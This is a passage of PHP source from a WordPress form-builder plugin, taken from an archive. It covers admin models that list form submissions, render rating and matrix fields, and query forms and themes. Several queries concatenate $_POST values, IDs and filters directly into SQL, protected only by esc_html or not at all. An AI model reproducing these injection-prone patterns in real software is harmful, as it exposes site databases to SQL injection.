          for ($key = 1; $key < count($join_query); $key++) {
            if ($join_query[$key] == 'sort') {
              $join .= 'LEFT JOIN (SELECT group_id as group_id' . $key . ', element_value   FROM ' . $wpdb->prefix . 'formmaker_submits WHERE ' . $where . ' AND element_label="' . $join_where[$key]['label'] . '") as t' . $key . ' ON t' . $key . '.group_id' . $key . '=t.group_id ';
              $orderby = ' ORDER BY t' . $key . '.`element_value` ' . $asc_or_desc . '';
            }
            else {
              $join .= 'INNER JOIN (SELECT group_id as group_id' . $key . ' FROM ' . $wpdb->prefix . 'formmaker_submits WHERE '.$where.' AND element_label="' . $join_where[$key]['label'] . '" AND  element_value LIKE "%' . $join_where[$key]['search'] . '%" ) as t' . $key . ' ON t' . $key . '.group_id' . $key . '=t.group_id ';
            }
          }
          break;
      }			  	  
      $pos = strpos($join, 'SELECT t.group_id');
      if ($pos === FALSE) {
        $query = str_replace(array('SELECT group_id','SELECT distinct group_id'), array('SELECT count(distinct group_id)','SELECT count(distinct group_id)'), $join);
      }
      else {
        $query = str_replace('SELECT t.group_id', 'SELECT count(t.group_id)', $join);
      }
      $total = $wpdb->get_var($query);
	  
	  $query_sub_count = "SELECT count(distinct group_id) from ".$wpdb->prefix."formmaker_submits";
      $sub_count = (int)$wpdb->get_var($query_sub_count);

	  $limit1 = (int)$total < $sub_count && !$pagination_clicked ? 0 : $limit; 
	  
      $query = $join . ' ' . $orderby . ' limit ' . $limit1 . ', 20 ';
      $results = $wpdb->get_results($query);
      for ($i = 0; $i < count($results); $i++) {
        array_push($rows_ord, $results[$i]->group_id); 
      }
      $where2 = array();
      $where2[] = "group_id='0'";
      foreach ($rows_ord as $rows_ordd) { 
        $where2[] = "group_id='" . $rows_ordd . "'";
      }
      $where2 = (count($where2) ? ' WHERE ' . implode( ' OR ', $where2 ) . '' : '' );
      $query = 'SELECT * FROM ' . $wpdb->prefix . 'formmaker_submits ' . $where2;
      $rows = $wpdb->get_results($query);
      $group_ids = $rows_ord;
      $lists['total'] = $total;
      $lists['limit'] = (int) ($limit1 / 20 + 1);
      $where_choices = $where;
      array_push($labels_parameters, $sorted_labels_id);
      array_push($labels_parameters, $sorted_label_types);
      array_push($labels_parameters, $lists);
      array_push($labels_parameters, $sorted_label_names);
      array_push($labels_parameters, $sorted_label_names_original);
      array_push($labels_parameters, $rows);
      array_push($labels_parameters, $group_ids);
      array_push($labels_parameters, $where_choices);
    }
    return $labels_parameters;
  }

  public function get_type_address($sorted_label_type, $sorted_label_name_original) {
    if ($sorted_label_type == 'type_address') {
      switch ($sorted_label_name_original) {
        case 'Street Line':
          $field_title = __('Street Address', 'form_maker');
          break;
        case 'Street Line2':
          $field_title = __('Street Address Line 2', 'form_maker');
          break;
        case 'City':
          $field_title = __('City', 'form_maker');
          break;
          case 'State':
          $field_title = __('State / Province / Region', 'form_maker');
          break;
        case 'Postal':
          $field_title = __('Postal / Zip Code', 'form_maker');
          break;
        case 'Country':
          $field_title = __('Country', 'form_maker');
          break;
        default :
          $field_title = stripslashes($sorted_label_name_original);
          break;
      }
    }
	  else {
	    $field_title = stripslashes($sorted_label_name_original);
    }
    return $field_title;
  }

  public function hide_or_not($hide_strings,$hide_string) {
    if (strpos($hide_string,'@') === FALSE) {
      if (strpos($hide_strings, '@' . $hide_string . '@') === FALSE) {
        $style = '';
      }
      else {
        $style = 'style="display:none"';
      }
    }
    else {
      if (strpos($hide_strings, $hide_string) === FALSE) {
        $style = '';
      }
      else {
        $style = 'style="display:none"';
      }
    }
    return $style;
  }

  public function sort_group_ids($sorted_label_names_count, $group_ids) {
    $count_labe = $sorted_label_names_count;
    $group_id_s = array();
    $l = 0;
    if (count($group_ids) > 0 and $count_labe) {
      for ($i = 0; $i < count($group_ids); $i++) {
        if (!in_array($group_ids[$i], $group_id_s)) {
          array_push($group_id_s, $group_ids[$i]);
        }
      }
    }
    return $group_id_s;
  }

  public function array_for_group_id($group, $rows) {
    $i = $group;
    $count_rows = count($rows);
    $temp = array();
    for ($j = 0; $j < $count_rows; $j++) {
      $row = $rows[$j];
      if ($row->group_id == $i) {
        array_push($temp, $row);
      }
    }
    return $temp;
  }

  public function check_radio_type($sorted_label_type) {
    if ($sorted_label_type == "type_checkbox" || $sorted_label_type == "type_radio" || $sorted_label_type == "type_own_select" || $sorted_label_type == "type_country"  || $sorted_label_type == "type_paypal_select" || $sorted_label_type == "type_paypal_radio" || $sorted_label_type == "type_paypal_checkbox" || $sorted_label_type == "type_paypal_shipping") {
      return TRUE;
    }
    else {
      return FALSE;
    }
  }

	public function statistic_for_radio($where_choices, $sorted_label_id) { 
		global $wpdb;
		$choices_params = array();
		$query = "SELECT element_value FROM " . $wpdb->prefix . "formmaker_submits WHERE " . $where_choices . " AND element_label='" . $sorted_label_id . "'";
		$choices = $wpdb->get_results($query);
		$colors=array('#5FE2FF','#F9E89C');
		$choices_colors=array('#4EC0D9','#DDCC7F');
		$choices_labels = array();
		$choices_count = array();
		$all = count($choices);
		$unanswered = 0;
		foreach ($choices as $key => $choice) {
			if ($choice->element_value == '') {
				$unanswered++;
			}
			else {
				if (!in_array($choice->element_value, $choices_labels)) {
					array_push($choices_labels, $choice->element_value);
					array_push($choices_count, 0);
				}
				$choices_count[array_search($choice->element_value, $choices_labels)]++;
			}
		}
		array_multisort($choices_count, SORT_DESC, $choices_labels);
		array_push($choices_params, $choices_count);
		array_push($choices_params, $choices_labels);
		array_push($choices_params, $unanswered);
		array_push($choices_params, $all);
		array_push($choices_params, $colors);
		array_push($choices_params, $choices_colors);
		return $choices_params;
	}

  public function get_data_of_group_id($id) {
    global $wpdb;
    $query = "SELECT * FROM " . $wpdb->prefix . "formmaker_submits WHERE group_id=" . $id;
    $rows = $wpdb->get_results($query);
    $form = $wpdb->get_row("SELECT * FROM " . $wpdb->prefix . "formmaker WHERE id=" . $rows[0]->form_id);
    $params = array();
    $label_id = array();
    $label_order_original = array();
    $label_type = array();
    $ispaypal = strpos($form->label_order, 'type_paypal_');
    if ($form->paypal_mode == 1) {
      if ($ispaypal) {
        $form->label_order = $form->label_order."0#**id**#Payment Status#**label**#type_paypal_payment_status#****#";
      }
    }
    $label_all = explode('#****#', $form->label_order);
    $label_all = array_slice($label_all, 0, count($label_all) - 1);
    foreach ($label_all as $key => $label_each) {
      $label_id_each = explode('#**id**#', $label_each);
      array_push($label_id, $label_id_each[0]);
      $label_oder_each = explode('#**label**#', $label_id_each[1]);
      array_push($label_order_original, $label_oder_each[0]);
      array_push($label_type, $label_oder_each[1]);
    }
    /*$theme_id = $wpdb->get_var("SELECT theme FROM " . $wpdb->prefix . "formmaker WHERE id='" . $form->id . "'");*/
    $css = $wpdb->get_var("SELECT css FROM " . $wpdb->prefix . "formmaker_themes");
    array_push($params, $rows);
    array_push($params, $label_id);
    array_push($params, $label_order_original);
    array_push($params, $label_type);
    array_push($params, $ispaypal);
    array_push($params, $form);
    array_push($params, $css);
    return $params;
  }

  public function check_type_for_edit_function($label_type) {
    if ($label_type != 'type_editor' and $label_type != 'type_submit_reset' and $label_type != 'type_map' and $label_type != 'type_mark_map' and $label_type != 'type_captcha' and $label_type != 'type_recaptcha' and $label_type != 'type_button') {
      return TRUE;
    }
    else {
      return FALSE;
    }
  }

  public function check_for_submited_label($rows, $label_id) {
    foreach ($rows as $row) {
      if ($row->element_label == $label_id) {
        $element_value = $row->element_value;
        break;
      }
      else {
        $element_value = 'continue';
      }
    }
    return $element_value;
  }

  public function view_for_star_rating($element_value, $element_label) {
    $view_star_rating_array = array();
    $new_filename = str_replace("***star_rating***", '', $element_value);
    $stars = "";
    $new_filename=explode('***', $new_filename);
    for ($j = 0; $j < $new_filename[1]; $j++) {
      $stars .= '<img id="' . $element_label . '_star_' . $j . '" src="' . WD_FMC_URL . '/images/star_' . $new_filename[2] . '.png?ver='. get_option("wd_form_maker_version").'" /> ';
    }
    for ($k = $new_filename[1]; $k < $new_filename[0]; $k++) {
      $stars .= '<img id="' . $element_label . '_star_' . $k . '" src="' . WD_FMC_URL . '/images/star.png?ver='. get_option("wd_form_maker_version").'" /> ';
    }
    array_push($view_star_rating_array, $stars);
    return $view_star_rating_array;
  }

  public function view_for_grading($element_value) {
    $view_grading_array = array();
    $new_filename = str_replace("***grading***", '', $element_value);
    $grading = explode(":", $new_filename);
    $items_count = sizeof($grading) - 1;
    $items = "";
    $total = "";
    for ($k = 0; $k < $items_count / 2; $k++) {
      $items .= $grading[$items_count / 2 + $k] . ": " . $grading[$k] . "</br>";
      $total += $grading[$k];
    }
    $items .= "Total: " . $total;
    array_push($view_grading_array, $items);
    return $view_grading_array;
  }

  public function images_for_star_rating($element_value, $label_id) {
    $edit_stars = "";
    $star_rating_array = array();
    $element_value1 = str_replace("***star_rating***", '', $element_value);
    $stars_value = explode('***', $element_value1);
    for ($j = 0; $j < $stars_value[1]; $j++) {
      $edit_stars .= '<img id="'.$label_id.'_star_'.$j.'" onclick="edit_star_rating('.$j.','.$label_id.')" src="' . WD_FMC_URL . '/images/star_'.$stars_value[2].'.png?ver='. get_option("wd_form_maker_version").'" /> ';
    }
    for( $k=$stars_value[1];$k<$stars_value[0];$k++) {
      $edit_stars .= '<img id="'.$label_id.'_star_'.$k.'" onclick="edit_star_rating('.$k.','.$label_id.')" src="' . WD_FMC_URL . '/images/star.png?ver='. get_option("wd_form_maker_version").'" /> ';
    }
    array_push($star_rating_array, $edit_stars);
    array_push($star_rating_array, $stars_value);
    return $star_rating_array;
  }

  public function params_for_scale_rating($element_value, $label_id) {
    $scale_rating_array = array();
    $scale_radio = explode('/', $element_value);
    $scale_value = $scale_radio[0];
    $scale = '<table><tr>';
    for ($k = 1; $k <= $scale_radio[1]; $k++) {
      $scale .= '<td style="text-align:center"><span>' . $k . '</span></td>';
    }
    $scale .= '<tr></tr>';
    for ($l = 1; $l <= $scale_radio[1]; $l++) {
      if ($l == $scale_radio[0]) {
        $checked = "checked";
      }
      else {
        $checked = "";
      }
      $scale .= '<td><input type="radio" name = "'.$label_id.'_scale_rating_radio" id = "'.$label_id.'_scale_rating_radio_'.$l.'" value="'.$l.'" '.$checked.' onClick="edit_scale_rating(this.value,'.$label_id.')" /></td>';
    }	
    $scale .= '</tr></table>';
    array_push($scale_rating_array, $scale);
    array_push($scale_rating_array, $scale_radio);
    array_push($scale_rating_array, $checked);
    return $scale_rating_array;
  }

  public function params_for_type_range($element_value, $label_id) {
    $range_value = explode('-', $element_value);
    $range = '<input name="'.$label_id.'_element0"  id="'.$label_id.'_element0" type="text" value="'.$range_value[0].'" onChange="edit_range(this.value,'.$label_id.',0)" size="8"/> - <input name="'.$label_id.'_element1"  id="'.$label_id.'_element1" type="text" value="'.$range_value[1].'" onChange="edit_range(this.value,'.$label_id.',1)" size="8"/>';
    return $range;
  }

  public function params_for_type_grading($element_value, $label_id) {
    $type_grading_array = array();
    $element_value1 = str_replace("***grading***", '', $element_value);
    $garding_value = explode(':', $element_value1);
    $items_count = sizeof($garding_value) - 1;
    $garding = "";
    $sum = "";
    for ($k = 0; $k < $items_count/2; $k++) {
      $garding .= '<input name="'.$label_id.'_element'.$k.'"  id="'.$label_id.'_element'.$k.'" type="text" value="'.$garding_value[$k].'" onKeyUp="edit_grading('.$label_id.','.$items_count.')" size="5"/> '.$garding_value[$items_count/2+$k].'</br>';
      $sum += $garding_value[$k];
    }
    array_push($type_grading_array, $garding);
    array_push($type_grading_array, $garding_value);
    array_push($type_grading_array, $sum);
    array_push($type_grading_array, $items_count);
    array_push($type_grading_array, $element_value1);
    return $type_grading_array;
  }

  public function params_for_type_matrix($element_value, $label_id) {
    $type_matrix_array = array();	
    $new_filename = str_replace("***matrix***", '', $element_value);
    $matrix_value = explode('***', $new_filename);
    $matrix_value = array_slice($matrix_value, 0, count($matrix_value) - 1);
    $mat_rows = $matrix_value[0];
    $mat_columns = $matrix_value[$mat_rows + 1];
    $matrix = "<table>";
    $matrix .= '<tr><td></td>';
    for ($k = 1; $k <= $mat_columns; $k++) {
      $matrix .= '<td style="background-color:#BBBBBB; padding:5px; border:1px; ">'.$matrix_value[$mat_rows+1+$k].'</td>';
    }
    $matrix .= '</tr>';
    $aaa = Array();
    $var_checkbox = 1;
    $selected_value = "";
    $selected_value_yes = "";
    $selected_value_no = "";
    for ($k = 1; $k <= $mat_rows; $k++) {
      $matrix .= '<tr><td style="background-color:#BBBBBB; padding:5px; border:1px;">'.$matrix_value[$k].'</td>';
      if ($matrix_value[$mat_rows + $mat_columns + 2] == "radio") {
        if ($matrix_value[$mat_rows + $mat_columns + 2 + $k] == 0) {
          $checked = "";
          $aaa[1] = "";
        }
        else {
          $aaa = explode("_", $matrix_value[$mat_rows + $mat_columns + 2 + $k]);
        }
        for ($l = 1; $l <= $mat_columns; $l++) {
          if ($aaa[1] == $l) {
            $checked = 'checked';
          }
          else {
            $checked = "";
          }
          $index = "'" . $k . '_' . $l . "'";
          $matrix .= '<td style="text-align:center;"><input name="'.$label_id.'_input_elementform_id_temp'.$k.'"  id="'.$label_id.'_input_elementform_id_temp'.$k.'_'.$l.'" type="'.$matrix_value[$mat_rows+$mat_columns+2].'" '.$checked.' onClick="change_radio_values('.$index.','.$label_id.','.$mat_rows.','.$mat_columns.')"/></td>';
        }
      }
      else {
        if ($matrix_value[$mat_rows+$mat_columns+2] == "checkbox") {
          for ($l = 1; $l <= $mat_columns; $l++) {
            if ($matrix_value[$mat_rows + $mat_columns + 2 + $var_checkbox] == 1) {
              $checked = 'checked';
            }
            else {
              $checked = '';
            }
            $index = "'".$k.'_'.$l."'";
            $matrix .='<td style="text-align:center;"><input name="'.$label_id.'_input_elementform_id_temp'.$k.'_'.$l.'"  id="'.$label_id.'_input_elementform_id_temp'.$k.'_'.$l.'" type="'.$matrix_value[$mat_rows+$mat_columns+2].'" '.$checked.' onClick="change_checkbox_values('.$index.','.$label_id.','.$mat_rows.','.$mat_columns.')"/></td>';
            $var_checkbox++;
          }
        }
        else {
          if ($matrix_value[$mat_rows + $mat_columns + 2] == "text") {
            for ($l = 1; $l <= $mat_columns; $l++) {
              $text_value = $matrix_value[$mat_rows+$mat_columns+2+$var_checkbox];
              $index = "'".$k.'_'.$l."'";									
              $matrix .= '<td style="text-align:center;"><input name="'.$label_id.'_input_elementform_id_temp'.$k.'_'.$l.'"  id="'.$label_id.'_input_elementform_id_temp'.$k.'_'.$l.'" type="'.$matrix_value[$mat_rows+$mat_columns+2].'" value="'.$text_value.'" onKeyUp="change_text_values('.$index.','.$label_id.','.$mat_rows.','.$mat_columns.')"/></td>';
              $var_checkbox++;
            }
          }
          else {
            for ($l = 1; $l <= $mat_columns; $l++) {
              $selected_text = $matrix_value[$mat_rows+$mat_columns + 2 + $var_checkbox];
              if ($selected_text == 'yes') {
                $selected_value_yes = 'selected';
                $selected_value_no = '';
                $selected_value = '';
              }
              else {
                if ($selected_text=='no') {
                  $selected_value_yes ='';
                  $selected_value_no ='selected';
                  $selected_value ='';
                }
                else {
                  $selected_value_yes = '';
                  $selected_value_no ='';
                  $selected_value ='selected';
                }
              }
              $index = "'".$k.'_'.$l."'";
              $matrix .= '<td style="text-align:center;"><select name="'.$label_id.'_select_yes_noform_id_temp'.$k.'_'.$l.'"  id="'.$label_id.'_select_yes_noform_id_temp'.$k.'_'.$l.'" onChange="change_option_values('.$index.','.$label_id.','.$mat_rows.','.$mat_columns.')"><option value="" '.$selected_value.'></option><option value="yes" '.$selected_value_yes.' >Yes</option><option value="no" '.$selected_value_no.'>No</option></select></td>';
              $var_checkbox++;
            }
          }
        }
      }
      $matrix .= '</tr>';
    }
    $matrix .= '</table>';
    array_push($type_matrix_array, $matrix);
    array_push($type_matrix_array, $new_filename);
    return $type_matrix_array;
  }
  
  public function select_data_from_db_for_labels($db_info,$label_column, $table, $where, $order_by) {
    global $wpdb;
        
		$query = "SELECT `" . $label_column . "` FROM " . $table . $where . " ORDER BY " . $order_by;
		if($db_info) { 
      $temp		= explode('@@@wdfhostwdf@@@',$db_info);
      $host		= $temp[0];
      $temp		= explode('@@@wdfportwdf@@@',$temp[1]);
      $port		= $temp[0];
      $temp		= explode('@@@wdfusernamewdf@@@',$temp[1]);
      $username	= $temp[0];
      $temp		= explode('@@@wdfpasswordwdf@@@',$temp[1]);
      $password	= $temp[0];
      $temp		= explode('@@@wdfdatabasewdf@@@',$temp[1]);
      $database	= $temp[0];
       
      $wpdb_temp = new wpdb($username, $password, $database, $host);
      $choices_labels = $wpdb_temp->get_col($query);				
    }
		else {
      $choices_labels = $wpdb->get_col($query);
    }
    return $choices_labels;
  }
  public function select_data_from_db_for_values($db_info,$value_column, $table, $where, $order_by) {
    global $wpdb;		  
		$query = "SELECT `" . $value_column . "` FROM " . $table . $where . " ORDER BY " . $order_by;
		if($db_info) {
      $temp		= explode('@@@wdfhostwdf@@@',$db_info);
      $host		= $temp[0];
      $temp		= explode('@@@wdfportwdf@@@',$temp[1]);
      $port		= $temp[0];
      $temp		= explode('@@@wdfusernamewdf@@@',$temp[1]);
      $username	= $temp[0];
      $temp		= explode('@@@wdfpasswordwdf@@@',$temp[1]);
      $password	= $temp[0];
      $temp		= explode('@@@wdfdatabasewdf@@@',$temp[1]);
      $database	= $temp[0];
       
      $wpdb_temp = new wpdb($username, $password, $database, $host);
      $choices_values = $wpdb_temp->get_col($query);				
    }
		else {
      $choices_values = $wpdb->get_col($query);
    }
    return $choices_values; 
  }
  public function get_subs_count($form_id) { 
    global $wpdb;
	$query = $wpdb->prepare("SELECT distinct group_id FROM " . $wpdb->prefix . "formmaker_submits where form_id=%d", $form_id);		
	$group_id_s = $wpdb->get_col($query);	
    return count($group_id_s);
  }
}

?>
admin/models/FMModelFormcontactwindow.php000060400000004673152434416630014561 0ustar00<?php

class FMModelFormcontactwindow {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////

  public function get_form_data() {
    global $wpdb;
	$row = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "formmaker WHERE `id` IN(" . get_option('contact_form_forms', 0) . ") order by `title`");
    return $row;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/FMModelThemes_fmc.php000060400000010762152434416630013120 0ustar00<?php

class FMModelThemes_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function get_rows_data() {
    global $wpdb;
    $where = ((isset($_POST['search_value']) && (esc_html($_POST['search_value']) != '')) ? 'WHERE title LIKE "%' . esc_html($_POST['search_value']) . '%"' : '');
    $asc_or_desc = ((isset($_POST['asc_or_desc']) && $_POST['asc_or_desc'] == 'desc') ? 'desc' : 'asc');
	$order_by_array = array('id', 'title', 'default');
    $order_by = isset($_POST['order_by']) && in_array(esc_html(stripslashes($_POST['order_by'])), $order_by_array) ? esc_html(stripslashes($_POST['order_by'])) :  'id';
    $order_by = ' ORDER BY `' . $order_by . '` ' . $asc_or_desc;
    if (isset($_POST['page_number']) && $_POST['page_number']) {
      $limit = ((int) $_POST['page_number'] - 1) * 20;
    }
    else {
      $limit = 0;
    }
    $query = "SELECT * FROM " . $wpdb->prefix . "formmaker_themes " . $where . $order_by . " LIMIT " . $limit . ",20";
    $rows = $wpdb->get_results($query);
    return $rows;
  }
  
  public function get_row_data($id, $reset) {
    global $wpdb;
    if ($id != 0) {
      $row = $wpdb->get_row($wpdb->prepare('SELECT * FROM ' . $wpdb->prefix . 'formmaker_themes WHERE id="%d"', $id));
      if ($reset) {
        if (!$row->default) {
          $row_id = $row->id;
          $row_title = $row->title;
          $row = $wpdb->get_row($wpdb->prepare('SELECT * FROM ' . $wpdb->prefix . 'formmaker_themes WHERE default="%d"', 1));
          $row->id = $row_id;
          $row->title = $row_title;
          $row->default = FALSE;
        }
        else {
          $row->css = '';
        }
      }
    }
    else {
      $row = new stdClass();
      $row->id = 0;
      $row->title = '';
      $row->css = '';
      $row->default = 0;
    }
    return $row;
  }
  
  public function page_nav() {
    global $wpdb;
    $where = ((isset($_POST['search_value']) && (esc_html($_POST['search_value']) != '')) ? 'WHERE title LIKE "%' . esc_html($_POST['search_value']) . '%"'  : '');
    $query = "SELECT COUNT(*) FROM " . $wpdb->prefix . "formmaker_themes " . $where;
    $total = $wpdb->get_var($query);
    $page_nav['total'] = $total;
    if (isset($_POST['page_number']) && $_POST['page_number']) {
      $limit = ((int) $_POST['page_number'] - 1) * 20;
    }
    else {
      $limit = 0;
    }
    $page_nav['limit'] = (int) ($limit / 20 + 1);
    return $page_nav;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/FMModelFormMakerPreview_fmc.php000060400000005155152434416630015120 0ustar00<?php

class FMModelFormMakerPreview_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////

  public function get_theme_css($id) {
    global $wpdb;
    $css = $wpdb->get_var($wpdb->prepare('SELECT css FROM ' . $wpdb->prefix . 'formmaker_themes WHERE id="%d"', $id));
    return $css;
  }

  public function get_form($form_id) {
    global $wpdb;
    $form = $wpdb->get_var($wpdb->prepare('SELECT form_front FROM ' . $wpdb->prefix . 'formmaker WHERE id="%d"', $form_id));
    return $form;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/FMModelFromipinfoinpopup_fmc.php000060400000004334152434416630015414 0ustar00<?php

class FMModelFromipinfoinpopup_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/FMModelWidget_fmc.php000060400000005041152434416630013110 0ustar00<?php

class FMModelWidget_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////

  public function get_gallery_rows_data() {
    global $wpdb;
	$where = 'WHERE `id` IN (' . (get_option('contact_form_forms', '') != '' ? get_option('contact_form_forms') : 0) . ')';
    $query = "SELECT * FROM " . $wpdb->prefix . "formmaker ".$where." order by `title` ";
    $rows = $wpdb->get_results($query);
    return $rows;
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/FMModelManage_fmc.php000060400000620235152434416630013065 0ustar00<?php

class FMModelManage_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function get_rows_data() {
    global $wpdb;
	$where = 'WHERE `id` IN (' . (get_option('contact_form_forms', '') != '' ? get_option('contact_form_forms') : 0) . ')';
    $where .= ((isset($_POST['search_value']) && (esc_html($_POST['search_value']) != '')) ? 'WHERE title LIKE "%' . esc_html($_POST['search_value']) . '%"' : '');
    $asc_or_desc = ((isset($_POST['asc_or_desc']) && $_POST['asc_or_desc'] == 'desc') ? 'desc' : 'asc');
	$order_by_array = array('id', 'title', 'mail');
	$order_by = isset($_POST['order_by']) && in_array(esc_html(stripslashes($_POST['order_by'])), $order_by_array) ? esc_html(stripslashes($_POST['order_by'])) :  'id';
    $order_by = ' ORDER BY `' . $order_by . '` ' . $asc_or_desc;
    if (isset($_POST['page_number']) && $_POST['page_number']) {
      $limit = ((int) $_POST['page_number'] - 1) * 20;
    }
    else {
      $limit = 0;
    }
    $query = "SELECT * FROM " . $wpdb->prefix . "formmaker " . $where . $order_by . " LIMIT " . $limit . ",20";
    $rows = $wpdb->get_results($query);
    return $rows;
  }
  
  public function get_row_data($id) {
    global $wpdb;
    if ($id != 0) {
      $row = $wpdb->get_row($wpdb->prepare('SELECT * FROM ' . $wpdb->prefix . 'formmaker WHERE id="%d"', $id));
    }
    else {
      $row = new stdClass();
      $row->id = 0;
      $row->title = '';
      $row->mail = '';
      $row->form = '';
      $row->form_front = '';
      $row->theme = 0;
      $row->javascript = '';
      $row->submit_text = '';
      $row->url = '';
      $row->submit_text_type = 0;
      $row->script1 = '';
      $row->script2 = '';
      $row->script_user1 = '';
      $row->script_user2 = '';
      $row->counter = 0;
      $row->label_order = '';
      $row->article_id = '';
      $row->pagination = '';
      $row->show_title = '';
      $row->show_numbers = '';
      $row->public_key = '';
      $row->private_key = '';
      $row->recaptcha_theme = '';
      $row->from_name = '';
      $row->from_mail = '';
      $row->label_order_current = '';
      $row->script_mail_user = '';
      $row->script_mail = '';
      $row->tax = 0;
      $row->payment_currency = '$';
      $row->paypal_email = '';
      $row->checkout_mode = 'testmode';
      $row->paypal_mode = 0;

      $row->published = 1;
      $row->form_fields = '';
      $row->savedb = 1;
      $row->sendemail = 1;
      $row->requiredmark = '*';
      $row->reply_to = 0;
      $row->send_to = 0;
      $row->autogen_layout = 1;
      $row->custom_front = '';
      $row->mail_from_user = '';
      $row->mail_from_name_user = '';
      $row->reply_to_user = '';
      $row->save_uploads = 1;
    }
    return $row;
  }

  public function get_row_data_new($id) {
    global $wpdb;
    if ($id != 0) {
